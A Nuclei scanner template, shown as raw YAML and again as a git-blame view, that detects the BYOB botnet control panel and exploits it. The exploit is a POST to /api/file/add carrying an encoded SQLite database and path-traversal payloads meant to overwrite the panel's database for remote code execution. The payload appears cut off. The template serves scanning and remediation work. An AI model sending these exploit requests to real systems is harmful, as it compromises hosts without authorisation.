nuclei-templates/http/vulnerabilities/malwared-byob-rce.yaml

id: malwared-byob-rce

info:
  name: Malwared BYOB - Unauthenticated Remote Code Execution
  author: pdteam
  severity: critical
  description: |
    Malwared BYOB - Unauthenticated RCE allows remote code execution.
  impact: |
    Potential unauthorized access and control of the target system by threat actors.
  remediation: |
    Remove any instances of the Malwared - Build Your Own Botnet tool from the target system and conduct a thorough security audit.
  reference:
    - https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/
    - https://github.com/chebuya/exploits/tree/main/BYOB-RCE
    - https://github.com/malwaredllc/byob
  metadata:
    verified: true
    max-request: 7
    shodan-query: http.favicon.hash:487145192
    fofa-query: icon_hash="487145192"
  tags: rce,malware,byob,botnet,oss


flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "Build Your Own Botnet"
          - "Post-Exploitation Framework"
          - "malwaredllc/byob"
        internal: true

  - raw:
      - |
        POST /api/file/add HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        data=U1FMaXRlIGZvcm1hdCAzABAAAQEAQCAgAAAADAAAAAsAAAAAAAAAAAAAAAUAAAAEAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAC52iQ0P%2BAAKCD4ADvYPzwyRDscLJQxiCYgK5Ag%2BCV8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIIeCQcXFRUBhB90YWJsZXRhc2t0YXNrCkNSRUFURSBUQUJMRSB0YXNrICgKCWlkIElOVEVHRVIgTk9UIE5VTEwsIAoJdWlkIFZBUkNIQVIoMzIpIE5PVCBOVUxMLCAKCXRhc2sgVEVYVCwgCglyZXN1bHQgVEVYVCwgCglpc3N1ZWQgREFURVRJTUUgTk9UIE5VTEwsIAoJY29tcGxldGVkIERBVEVUSU1FLCAKCXNlc3Npb24gVkFSQ0hBUigzMikgTk9UIE5VTEwsIAoJUFJJTUFSWSBLRVkgKGlkKSwgCglVTklRVUUgKHVpZCksIAoJRk9SRUlHTiBLRVkoc2Vzc2lvbikgUkVGRVJFTkNFUyBzZXNzaW9uICh1aWQpCiknCgYXOxUBAGluZGV4c3FsaXRlX2F1dG9pbmRleF90YXNrXzF0YXNrC4JZBwcXLS0BhGV0YWJsZWV4ZmlsdHJhdGVkX2ZpbGVleGZpbHRyYXRlZF9maWxlCENSRUFURSBUQUJMRSBleGZpbHRyYXRlZF9maWxlICgKCWlkIElOVEVHRVIgTk9UIE5VTEwsIAoJZmlsZW5hbWUgVkFSQ0hBUigzNCkgTk9UIE5VTEwsIAoJc2Vzc2lvbiBWQVJDSEFSKDE1KSBOT1QgTlVMTCwgCgltb2R1bGUgVkFSQ0hBUigxNSkgTk9UIE5VTEwsIAoJY3JlYXRlZCBEQVRFVElNRSBOT1QgTlVMTCwgCglvd25lciBWQVJDSEFSKDEyMCkgTk9UIE5VTEwsIAoJUFJJTUFSWSBLRVkgKGlkKSwgCglVTklRVUUgKGZpbGVuYW1lKSwgCglGT1JFSUdOIEtFWShvd25lcikgUkVGRVJFTkNFUyB1c2VyICh1c2VybmFtZSkKKT8IBhdTLQEAaW5kZXhzcWxpdGVfYXV0b2luZGV4X2V4ZmlsdHJhdGVkX2ZpbGVfMWV4ZmlsdHJhdGVkX2ZpbGUJgjoFBxcbGwGES3RhYmxlcGF5bG9hZHBheWxvYWQGQ1JFQVRFIFRBQkxFIHBheWxvYWQgKAoJaWQgSU5URUdFUiBOT1QgTlVMTCwgCglmaWxlbmFtZSBWQVJDSEFSKDM0KSBOT1QgTlVMTCwgCglvcGVyYXRpbmdfc3lzdGVtIFZBUkNIQVIoMyksIAoJYXJjaGl0ZWN0dXJlIFZBUkNIQVIoMTQpLCAKCWNyZWF0ZWQgREFURVRJTUUgTk9UIE5VTEwsIAoJb3duZXIgVk

    payloads:
      db_path:
        - /proc/self/cwd/buildyourownbotnet/database.db
        - /proc/self/cwd/../buildyourownbotnet/database.db
        - /proc/self/cwd/../../../../buildyourownbotnet/database.db
        - /proc/self/cwd/instance/database.db
        - /proc/self/cwd/../../../../instance/database.db
        - /proc/self/cwd/../instance/database.db

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "buildyourownbotnet/database.db"
# digest: 490a0046304402201273e8c79b6c6ee800aef79e70551f99097ad44f4b7e521efc509b04fd9d431c02206bffadd496403236e17956f53119014326ef1bf32030095b0feeec21774545bd:922c64590222798bb761d5b6d8e72950
Added byob detection + rce template 2024-08-17 09:58:02 +00:00			`id: malwared-byob-rce`

			`info:`
			`name: Malwared BYOB - Unauthenticated Remote Code Execution`
			`author: pdteam`
			`severity: critical`
			`description: \|`
			`Malwared BYOB - Unauthenticated RCE allows remote code execution.`
			`impact: \|`
			`Potential unauthorized access and control of the target system by threat actors.`
			`remediation: \|`
			`Remove any instances of the Malwared - Build Your Own Botnet tool from the target system and conduct a thorough security audit.`
Update malwared-byob-rce.yaml 2024-08-27 04:13:30 +00:00			`reference:`
			`- https://blog.chebuya.com/posts/unauthenticated-remote-command-execution-on-byob/`
			`- https://github.com/chebuya/exploits/tree/main/BYOB-RCE`
			`- https://github.com/malwaredllc/byob`
added metadata 2024-08-17 09:58:31 +00:00			`metadata:`
Update malwared-byob-rce.yaml 2024-08-27 04:13:30 +00:00			`verified: true`
			`max-request: 7`
added metadata 2024-08-17 09:58:31 +00:00			`shodan-query: http.favicon.hash:487145192`
			`fofa-query: icon_hash="487145192"`
Added byob detection + rce template 2024-08-17 09:58:02 +00:00			`tags: rce,malware,byob,botnet,oss`


			`flow: http(1) && http(2)`

			`http:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}"`

			`matchers:`
			`- type: word`
			`words:`
			`- "Build Your Own Botnet"`
			`- "Post-Exploitation Framework"`
			`- "malwaredllc/byob"`
			`internal: true`

			`- raw:`
			`- \|`
			`POST /api/file/add HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			data=U1FMaXRlIGZvcm1hdCAzABAAAQEAQCAgAAAADAAAAAsAAAAAAAAAAAAAAAUAAAAEAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAC52iQ0P%2BAAKCD4ADvYPzwyRDscLJQxiCYgK5Ag%2BCV8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIIeCQcXFRUBhB90YWJsZXRhc2t0YXNrCkNSRUFURSBUQUJMRSB0YXNrICgKCWlkIElOVEVHRVIgTk9UIE5VTEwsIAoJdWlkIFZBUkNIQVIoMzIpIE5PVCBOVUxMLCAKCXRhc2sgVEVYVCwgCglyZXN1bHQgVEVYVCwgCglpc3N1ZWQgREFURVRJTUUgTk9UIE5VTEwsIAoJY29tcGxldGVkIERBVEVUSU1FLCAKCXNlc3Npb24gVkFSQ0hBUigzMikgTk9UIE5VTEwsIAoJUFJJTUFSWSBLRVkgKGlkKSwgCglVTklRVUUgKHVpZCksIAoJRk9SRUlHTiBLRVkoc2Vzc2lvbikgUkVGRVJFTkNFUyBzZXNzaW9uICh1aWQpCiknCgYXOxUBAGluZGV4c3FsaXRlX2F1dG9pbmRleF90YXNrXzF0YXNrC4JZBwcXLS0BhGV0YWJsZWV4ZmlsdHJhdGVkX2ZpbGVleGZpbHRyYXRlZF9maWxlCENSRUFURSBUQUJMRSBleGZpbHRyYXRlZF9maWxlICgKCWlkIElOVEVHRVIgTk9UIE5VTEwsIAoJZmlsZW5hbWUgVkFSQ0hBUigzNCkgTk9UIE5VTEwsIAoJc2Vzc2lvbiBWQVJDSEFSKDE1KSBOT1QgTlVMTCwgCgltb2R1bGUgVkFSQ0hBUigxNSkgTk9UIE5VTEwsIAoJY3JlYXRlZCBEQVRFVElNRSBOT1QgTlVMTCwgCglvd25lciBWQVJDSEFSKDEyMCkgTk9UIE5VTEwsIAoJUFJJTUFSWSBLRVkgKGlkKSwgCglVTklRVUUgKGZpbGVuYW1lKSwgCglGT1JFSUdOIEtFWShvd25lcikgUkVGRVJFTkNFUyB1c2VyICh1c2VybmFtZSkKKT8IBhdTLQEAaW5kZXhzcWxpdGVfYXV0b2luZGV4X2V4ZmlsdHJhdGVkX2ZpbGVfMWV4ZmlsdHJhdGVkX2ZpbGUJgjoFBxcbGwGES3RhYmxlcGF5bG9hZHBheWxvYWQGQ1JFQVRFIFRBQkxFIHBheWxvYWQgKAoJaWQgSU5URUdFUiBOT1QgTlVMTCwgCglmaWxlbmFtZSBWQVJDSEFSKDM0KSBOT1QgTlVMTCwgCglvcGVyYXRpbmdfc3lzdGVtIFZBUkNIQVIoMyksIAoJYXJjaGl0ZWN0dXJlIFZBUkNIQVIoMTQpLCAKCWNyZWF0ZWQgREFURVRJTUUgTk9UIE5VTEwsIAoJb3duZXIgVk

			`payloads:`
			`db_path:`
			`- /proc/self/cwd/buildyourownbotnet/database.db`
			`- /proc/self/cwd/../buildyourownbotnet/database.db`
			`- /proc/self/cwd/../../../../buildyourownbotnet/database.db`
			`- /proc/self/cwd/instance/database.db`
			`- /proc/self/cwd/../../../../instance/database.db`
			`- /proc/self/cwd/../instance/database.db`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`part: body`
			`words:`
Update malwared-byob-rce.yaml 2024-08-27 04:13:30 +00:00			`- "buildyourownbotnet/database.db"`
chore: sign templates 🤖 2024-08-27 04:41:56 +00:00			`# digest: 490a0046304402201273e8c79b6c6ee800aef79e70551f99097ad44f4b7e521efc509b04fd9d431c02206bffadd496403236e17956f53119014326ef1bf32030095b0feeec21774545bd:922c64590222798bb761d5b6d8e72950`